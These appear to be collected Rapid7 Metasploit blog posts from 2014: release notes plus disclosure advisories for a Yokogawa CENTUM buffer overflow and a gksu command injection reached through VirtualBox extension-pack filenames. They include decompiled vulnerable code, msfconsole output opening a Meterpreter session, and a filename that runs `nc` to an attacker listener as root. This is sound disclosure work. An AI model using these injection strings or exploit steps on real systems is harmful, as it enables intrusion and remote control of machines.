
Don't Be (too) Naked in Vegas

Wow, it's exactly two more weeks today until DEFCON. While Rapid7 has had a vendor presence at Black Hat for many years (at booth #541), this year is, I believe, the first time that we'll have a vendor table at DEFCON. I'm super stoked about both gigs, since the Black Hat booth will give us an opportunity to unload give away a fresh new batch of Metasploit T-Shirt Design contest artifacts designed by contest winner R-OR. Check it out, pictured at right. For the DEFCON table, we'll be gouging selling a specially-branded, retro-designed T-shirt as an EFF fundraiser, since we really dig the idea of independent security researchers not going to jail for contributing their free time to various open source security projects, like ours.

 

defcon-tshirt-2014.png

I really, really like the fact that Rapid7 has taken to open-sourcing our conference swag. It resonates so well with our open source security mission. It would be so easy -- and wrong -- to try to bottle up Metasploit and take the open source projects into crippleware land. Rapid7 could reserve all the cool stuff (code AND T-shirts) for paid customers, but that's just not in our DNA. Incidentally, it would also be a disaster. Metasploit's strength, relevance, and effectiveness are hugely dependent on the efforts of the open source security community.

 

Now, don't get me wrong, there is some cool stuff in Metasploit Pro that you won't find elsewhere, but we remain committed to keeping the core functionality and content free and available on the Internet. Perhaps this is irrational, and it's definitely radical (in both the literal and 80's slang senses), but it's what keeps me, at least, still fired up and passionate about the social and technical missions for Metasploit.

 

If you'd like to meet some of the people who make Metasploit go, please drop by our table at the vendor room at DEFCON.

 

Speaking of giving away our secret sauce for free...

 

Metasploit Credential Overhaul

A few days ago, we published a new branch in our GitHub repository, staging/electro-release, along with the metasploit-credential repository, which together overhaul how Metasploit manages credentials. These aren't the credentials you use to log into Metasploit Pro, mind you; these are the credentials you pick up with the hundreds of password-stealing, -guessing, and -cracking modules. In these days of common, default, reused, and predictable passwords on common and not-so-common devices and applications, it's difficult to justify a penetration testing engagement that doesn't take a solid run at scoring some of the client's passwords.

 

The idea behind the Metasploit Credential gem is to have a "fully-fledged data model for tracking, storing, importing, and reasoning about credential data," to quote Trevor Rosen, my counterpart and engineering manager for the Metasploit Applications development team here at Rapid7. It's cool computer-sciencey stuff. If you're interested in diving in, feel free to clone the GitHub repo, check out the online documentation (pulled entirely from source), and start poking around in there. None of this is in the master Framework repo yet, so don't worry too much about what all this might mean for you yet. But, we wanted to give exploit devs a heads-up about what's coming up for the next version of Metasploit.

 

We'll have some documentation up in just a few days, right before the pilgrimage to Las Vegas. Also, there will be some exciting news related to this open source rework. Keep an eye out.

 

New Modules

We have seven new modules this week, including a trio of auxiliary modules by David Bloom taking advantage of some weaknesses in DbVisualizer. Also, pay special attention to Jon Hart's most excellent NTP Protocol Fuzzer, which you should absolutely never use against a production environment unless you want to make a point about Denial of Service attacks, such as, "Hey, are you using Kerberos? When your NTP server gets borked, how do you login?" That kind of thing.

 

Exploit modules

 

Auxiliary and post modules

 

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

D-Link Embedded Device Shells

This week, esteemed Metasploit contributor @m-1-k-3 has been at it again with his valiant personal crusade against insecure SOHO (small office/home office) embedded devices with known vulnerabilities. We have a new trio of modules that target D-Link gear, based on the research released by Craig Heffner and Zachary Cutlip, which exploit two bugs present in the DSP-W215 Smart Plug, and one UPnP command injection bug found in the DIR-815.

 

The research on these embedded devices is really quite solid. If you're at all interested in this kind of work, you can read Craig's excellent notes on his first and second Smart Plug bugs, published in May 2014, and Zachary's notes on the DIR-815 bug. Following along is now a ton easier with m-1-k-3's Metasploitization of these exploits, too, since you can now watch the traffic on the wire if you happen to have one of these devices in your home or lab.

 

This is the part where I rail about the Internet-of-Things. I'll keep beating this drum because it's not "merely" your home networks that are at risk. If the gadgets are cool and useful enough, you can be sure they will find their way into office spaces across all kinds of industries, making the job of the penetration tester less of an exercise in finding vulnerable devices to target and more of prioritizing which ones should get exploited first.

 

Nobody updates firmware, ever. Nobody.  As long as they're passing packets, and there's no IT department control over these things, these guys will remain vulnerable forever -- at least, until something radical changes in the embedded device space where updates are automatic and routine -- and don't fall prey to Evilgrade-like attacks, which have been around for a few years now.

 

Rubocop

Back in Metasploit developer land, we've had some good discussion this week on how to nudge the quality of code we get from our beloved contributors up the maintainability scale. Rapid7's Jon Hart suggested, and then promptly implemented, some hooks to Rubocop, a style checker based on the well-regarded Ruby Style Guide by Bozhidar Batsov and friends.

 

So, as of now, default runs of msftidy.rb will include a Rubocop check. The best part of Rubocop is that it can allow for some level of automatic code fix ups, if you launch it with the -a argument. While we don't want to fix your code out from under you, you can at least get a sense of your style guide conformance if you hook up msftidy to your own local git pre-commit hook.
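If you want to do exactly that, here is an added example of a git pre-commit hook (our own illustration for this post, not a hook shipped with the Framework) that runs tools/msftidy.rb on every staged module file and refuses the commit if any of them fails. The location of msftidy.rb, the modules/ prefix, and the MSFTIDY environment variable are assumptions about your checkout; adjust them to taste.

```ruby
#!/usr/bin/env ruby
# Added example, not Metasploit's own hook: a git pre-commit hook that runs
# tools/msftidy.rb (which now includes the Rubocop check) on every staged
# module file and aborts the commit when any of them fails.
# The msftidy path and the modules/ prefix are assumptions about the checkout.
#
# Install: cp this file .git/hooks/pre-commit && chmod +x .git/hooks/pre-commit

MSFTIDY = ENV.fetch('MSFTIDY', 'tools/msftidy.rb') # assumed location

# Keep only staged paths that are Ruby files under modules/.
def select_modules(paths)
  paths.map(&:strip).select { |p| p.start_with?('modules/') && p.end_with?('.rb') }
end

# Default runner: invoke msftidy.rb on one file and pass its exit status through.
def run_msftidy(path)
  system(MSFTIDY, path)
end

# Run the checker on each module. `runner` is any callable returning true on
# success, so the logic can be exercised without git or msftidy installed.
# Returns the list of paths that failed.
def check_modules(paths, runner: method(:run_msftidy))
  paths.reject { |path| runner.call(path) }
end

# Paths git has staged for this commit (added, copied or modified files only).
def staged_paths
  `git diff --cached --name-only --diff-filter=ACM`.lines
end

# Only talk to git when actually installed as the hook.
if $PROGRAM_NAME == __FILE__ && File.basename($PROGRAM_NAME) == 'pre-commit'
  failed = check_modules(select_modules(staged_paths))
  unless failed.empty?
    warn "msftidy/rubocop reported problems in:\n  #{failed.join("\n  ")}"
    warn 'Fix them (or try `rubocop -a` on the file) and re-stage before committing.'
    exit 1
  end
end
```

The hook only touches files under modules/, so edits to lib/ or documentation are never blocked, and because the checker is injected through `runner:` you can swap in rubocop directly if you want the style check without the rest of msftidy.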

 

It's important to make clear that style matters for maintainability. If you're involved in an open source endeavor and you have more than one contributor to your code base, having multiple personal styles is not only difficult to read in any sane development environment, but makes the likelihood of logic bugs creeping into your code much, much higher. Please believe me, we're not trying to make Metasploit contribution less fun by sticking to reasonable standard coding practices -- we're trying to make the code base, as a whole, more accessible, more reliable, and as bug free as we possibly can.

 

You can see rubocop -a in action over on Pull Request #3543, where we apply some automatic fixes on the tried-and-true MS08-067 module. Keep in mind we're still experimenting here -- if you have a module that doesn't hit the style guide 100%, we're not going to hold it against you, and won't block commits because of it. Hopefully, though, this kind of automatic syntax checking will go a long way to shoveling more awesome into Metasploit faster.

 

New Modules

As reviewed above, we have three new exploits, all D-Link, and one new auxiliary module, which targets Michele Spagnuolo's Rosetta Flash vulnerability, CVE-2014-4671.

 

Exploit modules

 

Auxiliary and post modules

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Hopping Meterpreter Through PHP

 

This week, Metasploit landed and shipped the new Reverse HTTP hop stager for Meterpreter payloads, which opens up yet another avenue for pivoting about the Internet to connect to your various and sundry Meterpreter shells. This is kind of a huge deal.

 

For starters, this obviously helps with crossing artificial borders between networks. You may have an engagement target that has a vulnerable web server in a DMZ that's running PHP, so you can use that machine as a quick and easy Meterpreter pivot point into the nominally "separate" network on the other side.

 

In addition, this kind of hopping behavior can help a lot with staying undetected by the pen-test target's IDS and IPS. Imagine that you know that a certain machine or range is on an exclusion list for alerting (which is all too often the case when IT security folks are having trouble tuning out false positives from certain devices). The enterprising attacker can take control of that purposely-ignored device, stand up a quick Nginx server with PHP, and start rerouting all his otherwise suspicious traffic through there.

 

If you're interested in seeing this bad boy in action, you're invited to check out a screencast of the payload:

 

Tons of thanks to Matt @scriptjunkie Weeks for his effort on this, and for casually mentioning this feature at a recent hacker BBQ here in Austin.

 

New Modules

We've four new exploits and one new auxiliary module this week for Metasploit users, including one for the long-anticipated, recently disclosed Yokogawa vulnerability, CVE-2014-3888.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Last March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product. As noted in the talk, we are releasing information about all of the vulnerabilities we found in the product at the time. Today, we're disclosing the last one of the discovered vulnerabilities.

 

For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

 

Vulnerability Summary

 

The Yokogawa Centum CS3000 solution uses several services to provide its functionality. The "BKFSim_vhfd.exe" service, started when running the "FCS / Test Function" for extended virtual testing, listens by default on port 20010 (TCP and UDP). By sending a specially crafted packet to UDP/20010 it's possible to trigger a stack-based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

 

Disclosure Timeline

 

Date          Description
Mar 5, 2014   Initial contact to vendor
Mar 10, 2014  Vendor advised contacting CERT/CC, JPCERT
Mar 11, 2014  Disclosed to CERT/CC, CVE-2014-3888 assigned
May 07, 2014  Metasploit module published in Pull Request #3499

 

Technical Analysis

 

The vulnerability exists in the function "sub_403E10" (IDA notation), used for logging by the "BKFSim_vhfd.exe" service. The vulnerable function assembles log lines from a defined list of pre-formatted strings (format strings) and, in some cases, user-controlled (tainted) data. It does so with dangerous functions and fixed-size stack buffers, so the buffers are no longer large enough once a log line is built from malicious user-controlled data.

 

Two vulnerable points have been found in this function, each of which corrupts a different stack buffer when a log line is built from user-controlled data:

 

BOOL sub_403E10(BOOL a1, const char *Format, ...)
{
  unsigned int v2; // ecx@1
  BOOL result; // eax@1
  unsigned int v4; // ebx@7
  void *v5; // edi@7
  HANDLE v6; // edx@7
  unsigned int v7; // ecx@7
  struct _SYSTEMTIME SystemTime; // [sp+0h] [bp-220h]@7
  DWORD NumberOfBytesWritten; // [sp+14h] [bp-20Ch]@7
  char Buffer[260]; // [sp+18h] [bp-208h]@7 // Overflow 2
  char Dest[260]; // [sp+11Ch] [bp-104h]@4 // Overflow 1
  va_list va; // [sp+22Ch] [bp+Ch]@1


  va_start(va, Format);
  HIWORD(v2) = 0;
  *((_WORD *)lpBaseAddress + 192) = 61;
  result = a1;
  LOWORD(v2) = *((_WORD *)lpBaseAddress + 177);
  if ( v2 >= a1 && Format && hObject != (HANDLE)-1 )
  {
    memset(Dest, 0, 0x100u);
    Dest[256] = 0;
    if ( strlen(Format) < 0x100 )
      vsprintf(Dest, Format, va);//Buffer Overflow 1: Dangerous use of vsprintf to copy data to the stack
    else
      sprintf(Dest, "data size too big (>= %i)", 256);
    GetLocalTime(&SystemTime);
    sprintf(
      &Buffer,
      "%02d/%02d/%02d %02d:%02d:%02d:%03d::sim_vhfd",
      SystemTime.wYear % 100,
      SystemTime.wMonth,
      SystemTime.wDay,
      SystemTime.wHour,
      SystemTime.wMinute,
      SystemTime.wSecond,
      SystemTime.wMilliseconds);
    v4 = strlen(Dest) + 1;
    v5 = &Buffer + strlen(&Buffer); // v5 points inside Buffer, after the log header
    memcpy(v5, Dest, 4 * (v4 >> 2)); // Buffer Overflow 2: Dangerous use of memcpy to copy data to the stack
    v6 = hObject;
    memcpy((char *)v5 + 4 * (v4 >> 2), &Dest[4 * (v4 >> 2)], v4 & 3);
    v7 = strlen(&Buffer);
    *(&Buffer + v7) = 13;
    Buffer[v7 - 1] = 10;
    WriteFile(v6, &Buffer, v7 + 2, &NumberOfBytesWritten, 0);
    result = FlushFileBuffers(hObject);
    *((_WORD *)lpBaseAddress + 192) = 62;
  }
  return result;
}






 

By sending specially crafted data to UDP/20010, it's possible to force a call to the vulnerable function with user-controlled data large enough to overflow the stack buffers.

 

In order to demonstrate the vulnerability, a malformed heartbeat (HealthFromUDP) packet has been used. These packets are exchanged between the different HIS stations and the FCS simulator:

 

packets.png

According to our understanding of the packets:

  • The first 16 bytes are a header, where:
    • At offset 6 there is a two-byte packet identifier.
    • At offset 15 there is a one-byte packet length.
  • The last 4 bytes are a trailer.
  • The bytes between the header and the trailer are the exchanged data (the HIS station identifier in this case).

 

packet.png

 

  • Command/operation (heartbeat)
  • Packet Length
  • Data (HIS identifier)

 

When a packet like the above is received, the vulnerable program will try to build a log line with the following format:

 

"ERROR:HealthFromUDP():GetHostTblPosByName(hostname=%s) rtnno=%d"





 

It uses the HIS identifier as the hostname, which leads to the buffer overflows described above.
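To make the packet layout and the overflow arithmetic concrete, here is an added example (our illustration for this post, not the Metasploit module or any Yokogawa code). It builds and parses a heartbeat packet with the layout described above, and works out how many bytes the two log buffers in sub_403E10 receive for a given HIS identifier, using the 260-byte buffer sizes and the 31-character timestamp header visible in the decompiled function. The header bytes the post does not describe are zero-filled, the packet identifier and trailer values are placeholders, and the length byte is assumed to count the whole packet; the real values come from a capture like the one pictured above.

```ruby
# Added example, not the Metasploit module or Yokogawa code: the HealthFromUDP
# heartbeat packet as the post describes it, plus the log-buffer arithmetic
# for sub_403E10. Undescribed header bytes are zero-filled; the packet_id and
# trailer defaults and "length counts the whole packet" are assumptions.

HEADER_LEN  = 16
ID_OFFSET   = 6
LEN_OFFSET  = 15
TRAILER_LEN = 4

# From the decompiled function: Dest and Buffer are 260 bytes each.
STACK_BUF_LEN = 260
LOG_FORMAT    = 'ERROR:HealthFromUDP():GetHostTblPosByName(hostname=%s) rtnno=%d'
TIME_HEADER   = '%02d/%02d/%02d %02d:%02d:%02d:%03d::sim_vhfd'

# Build a heartbeat packet carrying `his_id` as the data field.
def build_heartbeat(his_id, packet_id: "\x00\x01".b, trailer: ("\x00" * TRAILER_LEN).b)
  raise ArgumentError, 'packet_id must be two bytes' unless packet_id.bytesize == 2
  header = ("\x00" * HEADER_LEN).b
  header[ID_OFFSET, 2] = packet_id.b
  total = HEADER_LEN + his_id.bytesize + TRAILER_LEN
  # A single length byte cannot represent an oversized packet; it simply wraps,
  # so the length field is no guard against a long identifier.
  header[LEN_OFFSET] = [total & 0xff].pack('C')
  header + his_id.b + trailer.b
end

# Split a packet back into its fields.
def parse_heartbeat(pkt)
  raise ArgumentError, 'packet too short' if pkt.bytesize < HEADER_LEN + TRAILER_LEN
  {
    packet_id: pkt.byteslice(ID_OFFSET, 2),
    length:    pkt.getbyte(LEN_OFFSET),
    data:      pkt.byteslice(HEADER_LEN, pkt.bytesize - HEADER_LEN - TRAILER_LEN),
    trailer:   pkt.byteslice(-TRAILER_LEN, TRAILER_LEN),
  }
end

# How the two stack buffers fare when the service logs `hostname`:
# vsprintf writes the formatted line plus NUL into Dest (overflow 1), then
# memcpy appends strlen(Dest)+1 bytes after the 31-byte timestamp in Buffer
# (overflow 2). Buffer fills up first because of that header.
def log_sizes(hostname, rtnno: 0)
  dest = format(LOG_FORMAT, hostname, rtnno)
  time = format(TIME_HEADER, 14, 1, 1, 0, 0, 0, 0) # any timestamp is 31 chars
  dest_written   = dest.bytesize + 1
  buffer_written = time.bytesize + dest_written
  {
    dest_bytes:      dest_written,
    dest_overflow:   dest_written > STACK_BUF_LEN,
    buffer_bytes:    buffer_written,
    buffer_overflow: buffer_written > STACK_BUF_LEN,
  }
end
```

Run log_sizes with a normal station name (seven characters) and both buffers stay under a hundred bytes; push the identifier past 168 bytes and Buffer overflows while Dest is still intact, and past 199 bytes both are overrun. That is the margin the exploit's 789-byte packet sails past.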

 

Exploitation

 

Exploitation has been confirmed by sending a heartbeat packet with a long HIS identifier in the Data field. This overwrites the return address (EIP) saved on the stack (in fact it's overwritten twice, once per overflow) and yields code execution, since the vulnerable function has no stack cookie protection.

 

As a proof of concept, a working exploit has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where it is possible to gain arbitrary code execution:

 

msf > use exploit/windows/scada/yokogawa_bkfsim_vhfd
msf exploit(yokogawa_bkfsim_vhfd) > set RHOST 172.17.1.63
RHOST => 172.17.1.63
msf exploit(yokogawa_bkfsim_vhfd) > rexploit
[*] Reloading module...

[*] Started bind handler
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3 (English), sending 789 bytes...
[*] Sending stage (769024 bytes) to 172.17.1.63
[*] Meterpreter session 1 opened (172.17.1.1:58714 -> 172.17.1.63:4444) at 2014-02-17 23:03:24 +0100

meterpreter > getuid
Server username: HIS0163\CENTUM
meterpreter > sysinfo
Computer        : HIS0163
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : es_ES
Meterpreter     : x86/win32

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Poisoning VirtualBox via Crafted Filenames

When I began researching this, I believed the vulnerability lay within VirtualBox, but I realized after a bit that this was not true. The vulnerability being hit is actually within gksu itself. In fact, VirtualBox did everything right (sort of). I do take advantage of a weakness in the way it validates extension packs, but the reason the vulnerability results in a root shell is that it is hit after gksu escalates privileges to root. You *must* install the extension pack via the helper app, which means double-clicking it or opening it from the graphical UI. This also works when reinstalling the same (but maliciously renamed) extension pack.

 

Incidentally, this bug was already reported in the maintainer's bug tracker, but the true, dangerous scope of the bug when it comes to things like VirtualBox, various package managers, et cetera, seems to have been unclear.

 

Disclosure Timeline

Below is the timeline Brandon Perry and Rapid7 followed to disclose this issue.

 

Date                Action
Aug 15, 2013 (Thu)  Vulnerable behavior first noticed (approximately)
Apr 28, 2014 (Mon)  Submitted to HP's ZDI program for consideration
Apr 30, 2014 (Wed)  Entrusted to Rapid7 for disclosure
May 21, 2014 (Wed)  Disclosed to vendor, Gustavo Noronha Silva
Jun 06, 2014 (Fri)  Disclosed to CERT/CC
Jun 10, 2014 (Tue)  CVE-2014-2943 assigned
Jul 07, 2014 (Mon)  Public disclosure

 

Vulnerability Details

A Linux system with KDE installed will likely not be vulnerable to this, because the code path that uses gksu checks whether kdesudo is installed before checking for gksu. The logic that dictates this is within VBoxExtPackHelperApp.cpp around line 1429. Per the comment above that logic, this will likely be fixed on the VirtualBox side if it is rewritten to use PolicyKit.

 

 

In order to hit the vulnerability on a default Ubuntu install, you must uncheck the 'sudo-mode' key in the /apps/gksu gconf schema. That makes gksu ask for the 'root' user's password instead of the current user's, since it then escalates privileges with 'su' rather than 'sudo'. On CentOS, for instance, this is not needed, as that is the default.

 

 

The vulnerability lies in the filename. At the time of writing, there is only one known VirtualBox extension pack, offered by Oracle on their website alongside the VirtualBox installer; it adds proprietary functionality. It is called:

 

 

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack

 

 

When VirtualBox opens this file, it checks the filename against a value stored within the extension pack and ensures they match. If they do not, VirtualBox bails. You can get around this, however, with a little bit of trickery:

 

 

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack.fdsa.vbox-extpack

 

 

By appending directly to the end of the expected name, you can bypass the filename check. By appending an extra .vbox-extpack, an administrator can still double-click the file and have the window manager open VirtualBox to install the extension pack.

 

 

In order to take advantage of the vulnerability in gksu, you can create a small test name that connects back to a netcat listener:

 

 

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack.$(nc 192.168.1.99 4444).vbox-extpack

 

 

When this is passed to gksu, gksu passes the payload to 'gksu-run-helper' as an argument wrapped in "double" quotes. When gksu executes the gksu-run-helper command as root, the payload is evaluated within those double quotes (even though VirtualBox single-quoted it!).

 

 

Within the gksu_su_fuller function in libgksu.c (around line 1928), gksu builds the string that it will eventually run. Lines ~1996 and 1997 look like this:

 

 

1996      cmd[i] = g_strdup_printf ("%s \"%s\"", auxcommand,
1997        context->command); i++;

 

 

auxcommand is ‘gksu-run-helper’ and context->command is the command that will be run in the context of the root user. You can see that it uses “double” quotes to encapsulate the command.
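The following added example (our own illustration, not libgksu or VirtualBox code) reproduces the two halves of the problem just described: the prefix-style filename check that a renamed pack slips past, and the quoting mistake that turns the name into a command. build_unsafe assembles the helper command line the way the g_strdup_printf call above does; build_safe uses shell quoting that keeps the argument literal; both are then handed to `sh -c` the way `su root -c` / `bash -c` run them. The helper command (`printf %s`, which just echoes its argument), the assumption that the pack-name check is a prefix match, and the harmless `$(echo INJECTED)` marker are this example's choices.

```ruby
require 'shellwords'

# Added example, not libgksu or VirtualBox code: the filename check as the
# post describes it, and the double-quote wrapping from libgksu.c beside a
# safe construction, each run through sh -c as su -c / bash -c would.

EXPECTED_NAME = 'Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack'

# The pack-name check as described: anything appended after the expected
# name still passes (assumption: the stored value is matched as a prefix).
def name_check_passes?(filename)
  filename.start_with?(EXPECTED_NAME)
end

# libgksu's construction: the whole command is dropped inside double quotes,
# so $(...) in it is still expanded by the root shell, no matter how the
# caller (VirtualBox) quoted the individual arguments.
def build_unsafe(auxcommand, command)
  format('%s "%s"', auxcommand, command)
end

# A safe construction: escape every shell metacharacter in the command so the
# root shell sees exactly the bytes the caller passed.
def build_safe(auxcommand, command)
  "#{auxcommand} #{Shellwords.shellescape(command)}"
end

# Hand the assembled line to a shell, as su -c / bash -c do, and return stdout.
def run_via_shell(cmdline)
  IO.popen(['sh', '-c', cmdline], &:read)
end

# Constructed sample: the helper argument VirtualBox would pass, with the
# single quotes it adds, carrying a harmless command substitution.
def sample_command
  "--tarball '/home/bperry/Downloads/#{EXPECTED_NAME}.$(echo INJECTED).vbox-extpack'"
end
```

Feed sample_command through build_unsafe with `printf %s` as the helper and the shell hands back the path with INJECTED substituted in, which is exactly the moment the `nc` in the real filename would fire as root; build_safe returns the argument byte for byte, `$(...)` and all, so the only consequence of the odd filename is the "file not found" error the post mentions.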

 

 

Here is a ps aux listing showing the execution progression; note the increasing PIDs:

 

 

bperry    9708  0.0  0.4 106352  4272 ?        S    19:23  0:00 /usr/lib/virtualbox/VBoxExtPackHelperApp install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name Oracle VM VirtualBox Extension Pack --tarball /home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-extpack.$(nc 192.168.1.31 4444).vbox-extpack --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 --replace

bperry    9710  1.6  1.0 186440 11100 ?        S    19:23  0:00 /usr/bin/gksu /usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-extpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 --replace

root      9715  0.0  0.1  59928  1780 pts/2    Ss+  19:23  0:00 /bin/su root -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-extpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 --replace"

root      9724  0.0  0.1  12380  1252 ?        Ss  19:24  0:00 bash -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-extpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 --replace"

root      9725  0.0  0.0  12380  672 ?        S    19:24  0:00 bash -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-extpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 --replace"

 

 

The above output was taken while VirtualBox was frozen because I had not yet dropped the connection made between the VM and the other machine (you can try this yourself). The last command run is the gksu-run-helper command with our command in "double" quotes. If you hit the vulnerability properly, the bash metacharacters will not appear in the final command run, and VirtualBox will error out because the file it is looking for will not exist (unless the attacker can create it?).

 

 

This vulnerability could easily affect other applications that users must escalate privileges to use (package managers come to mind). Using this method, attackers could craft specially named files whose contents still match the expected MD5 sums, but whose names carry bash metacharacters that get parsed as root.

 

You may watch a short video detailing and demoing the vuln on YouTube:

 

gksu-video.png

In this week's Metasploit update, we'd like to introduce two sandbox-escaping exploits for Internet Explorer, and demonstrate how you're supposed to use them. The two we're covering are MS13-097, an escape that abuses Windows registry symlinks, and MS14-009, which exploits a type traversal bug in the .Net Deployment Service. We will also briefly go over other new modules and changes. Here we go.


Why You Need a Sandbox Escape in Internet Explorer

 

A couple of years ago, exploiting Internet Explorer was pretty straightforward. In most cases you only needed one exploitable vulnerability to gain arbitrary code execution, and you had lots of freedom in the context of the user. Well, times have changed quite a bit since the birth of Protected Mode, and it has become even harder with Enhanced Protected Mode. Nowadays, a single vulnerability is no longer enough in newer versions of Internet Explorer; you most likely need multiple flaws, at least one of them a sandbox bypass, and then you chain them together in order to actually do some real damage. Here's an example of what it's like to operate under Internet Explorer 11's Enhanced Protected Mode:

 

Screen Shot 2014-07-01 at 3.58.31 PM.png

 

As you can see, my Meterpreter shell can't even create a directory from within the iexplore.exe process due to its low privileges, so we're going to have to escalate. Let's pick exploit/windows/local/ms14_009_ie_dfsvc as an example; it is used the way you would use pretty much any other local privilege escalation module:

 

Screen Shot 2014-07-01 at 4.11.25 PM.png

 

Much better. Looks like we have more freedom to do more stuff to the system.

 

Although the MS14-009 module was intended for Enhanced Protected Mode during development, it should also work fine against different patch levels of Internet Explorer as long as the .Net Framework version is outdated (4.5.0, 4.5.1, or older). There is also a check() method implemented, which you can call on your own by using the "check" command. But the exploit will call check() anyway when you try to use it, so it's a bit safer to use than the other sandbox bypass exploit. The MS13-097 module is pretty much used the same way, but is more specific to Internet Explorer. There is no check implemented in that one, so use it at your own risk.


Special thanks to James Forshaw for the above discoveries and proof of concepts, and Juan Vazquez for the Metasploit modules.

 

More Goodies

 

  • exploit/windows/http/cogent_datahub_command - This week's release also includes an exploit for Cogent DataHub 7.3.5, a human-machine interface designed to manage embedded data in real time. I'm sure you guys (and gals) aren't crazy enough to fire exploits directly against any SCADA systems in production, but it's still important to remind you that using this module will most likely cause the remote service to hang, requiring a manual restart, which is why this is a Manual Ranking module.
  • exploit/windows/http/hp_autopass_license_traversal - This is a licensing server made by HP, which is exploitable because it enforces no authentication and suffers from a directory traversal that allows you to upload a malicious JSP payload file to compromise the machine. This is actually a fairly typical problem in web applications; HP unfortunately is no exception.
  • auxiliary/scanner/ssh/cerberus_sftp_enumusers - Originally found by Steve Embling, and submitted by our new Metasploit contributor Matt Byrne. You can use this module to enumerate users from Cerberus FTP via the SSH service. Useful during information gathering, because you know what they say: "If I had eight hours to chop down a tree, I'd spend the first six of them sharpening my axe."

 

Other Changes

 

  • Additional support of WEP, PSK, and MGT for module auxiliary/gather/chromecast_wifi
  • Improved SMB client API - Mainly we did some work on how the SMB recv method caches data, and on being more tolerant of out-of-sync SMB responses for better reliability. We also reworked the auxiliary/gather/windows_deployment_services_shares module to adapt to the new changes.
  • Fixed a NoMethodError bug in struts_code_exec_parameters

 

If you're new to Metasploit, feel free to get started with the free version here for either Linux or Windows, or get the trial version of Metasploit Pro for serious pwnage. For those who already use Metasploit, make sure to run the msfupdate command and get the latest changes, GUI users (Pro and Community) should use the Software Update button instead.

 

For additional details about this update, please see the release notes.

 

May the force be with you.
